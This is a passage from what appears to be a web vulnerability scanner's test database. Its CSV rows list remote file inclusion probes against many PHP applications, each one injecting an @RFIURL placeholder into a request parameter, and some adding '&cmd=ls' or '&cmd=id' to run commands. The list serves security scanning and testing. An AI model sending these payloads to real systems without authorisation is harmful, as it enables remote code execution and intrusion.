(RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005263\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/link_main.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005264\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/linkadmin.php?page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005265\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005266\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005267\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/list.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005268\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005269\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lms_path/modules/welcome.php?_LIB_DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005270\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/load_lang.php?_SERWEB[configdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005271\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/load_lang.php?_SERWEB[serwebdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005272\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/load_phplib.php?_PHPLIB[libdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005273\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/loader.php?GLOBALS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005274\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/local/lib/lcUser.php?LIBDIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005275\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/log.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005276\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/login.php3?cl_headers=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005277\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/login.php?base_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005278\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/login.php?blog_theme=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005279\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/login.php?langfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005280\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/login.php?pachtofile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005281\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/login.php?srcdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005282\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/login.php?value=@RFIURL??\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005283\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/lovecms/install/index.php?step=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005284\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/m2f/m2f_cron.php?m2f_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005285\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/m2f/m2f_forum.php?m2f_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005286\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/m2f/m2f_mailinglist.php?m2f_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005287\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/m2f/m2f_phpbb204.php?m2f_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005288\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/maguz.php?site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005289\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mail/childwindow.inc.php?form=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005290\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mail/childwindow.inc.php?form=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005291\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005292\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005293\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mail_this_entry/mail_autocheck.php?pm_path=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005294\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main.inc.php?pathtoscript=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005295\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main.php?config[search_disp]=true&include_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005296\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main.php?id=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005297\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005298\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005299\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main.php?pageURL=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005300\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main.php?pagina=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005301\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main/forum/komentar.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005302\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main/main.php?pi=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005303\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main/ppcbannerclick.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005304\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main/ppcclick.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005305\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/main_prepend.php?_SERWEB[functionsdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005306\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mainpage.php?docroot=@RFIURL?cmd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005307\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mamboleto.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005308\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005309\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/manage_songs.php?foing_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005310\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/manager/admin/index.php?MGR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005311\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/manager/admin/p_ins.php?MGR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005312\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/manager/admin/u_ins.php?MGR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005313\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/manager/articles.php?_PX_config[manager_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005314\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/manager/static/view.php?propID=0&INC=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005315\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/master.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005316\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mcNews/admin/header.php?skinfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005317\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mcf.php?content=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005318\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mcnews/admin/install.php?l=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005319\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005320\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/member.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005321\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/member.php?vwar_root=@RFIURL&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005322\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/member/usercp_menu.php?script_folder=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005323\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/members/index.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005324\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/members/registration.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005325\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/members_help.php?hlp=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005326\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/membres/membreManager.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005327\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/menu.php3?cl_headers=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005328\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/menu.php?functions_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005329\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mep/frame.php?chem=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005330\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/microcms/includes/file_manager/special.php?fm_includes_special=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005331\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/middle.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005332\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/migrateNE2toNE3.php?_NE[AbsPath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005333\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005334\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005335\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005336\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005337\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005338\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005339\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mini-pub.php/front-end/img.php?sFileName=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005340\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/minimal/wiki.php?page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005341\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/misc/function.php3?path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005342\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mitglieder.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005343\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mkportal/include/user.php?MK_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005344\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mkportal/include/user.php?MK_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005345\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mod/authent.php4?rootpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005346\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mod/image/index.php?config[pathMod]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005347\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mod/liens/index.php?config[pathMod]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005348\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mod/liste/index.php?config[pathMod]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005349\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mod/special/index.php?config[pathMod]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005350\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mod/texte/index.php?config[pathMod]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005351\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mod_membre/inscription.php?chemin=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005352\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mod_phpalbum/sommaire_admin.php?chemin=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005353\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modernbill/include/html/config.php?DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005354\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modifyform.html?code=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005355\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mods/business_functions.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005356\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mods/config/load.inc.php?moddir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005357\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mods/http/load.inc.php?moddir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005358\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/mods/ui_functions.php?GALLERY_BASEDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005359\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/module/forum/forum.php?fd=@RFIURL=';\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005360\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/module/forum/main.php?id=1&main_dir=@RFIURL?&\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005361\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules.php?name=@RFIURL&file=article&sid=2\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005362\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/4nAlbum/public/displayCategory.php?basepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005363\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005364\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/Calendar/admin/update.php?calpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005365\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/Calendar/calendar.php?calpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005366\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/Calendar/scheme.php?calpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005367\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/Discipline/CategoryBreakdownTime.php?FocusPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005368\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/Discipline/CategoryBreakdownTime.php?staticpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005369\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/Discipline/StudentFieldBreakdown.php?staticpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005370\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/Forums/admin/admin_styles.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005371\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005372\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/My_eGallery/index.php?basepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005373\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/My_eGallery/public/displayCategory.php?basepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005374\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005375\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/NukeAI/util.php?AIbasedir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005376\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005377\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005378\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/abook/foldertree.php?baseDir==@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005379\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/addons/plugin.php?doc_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005380\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/modules/admin/include/config.php?doc_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 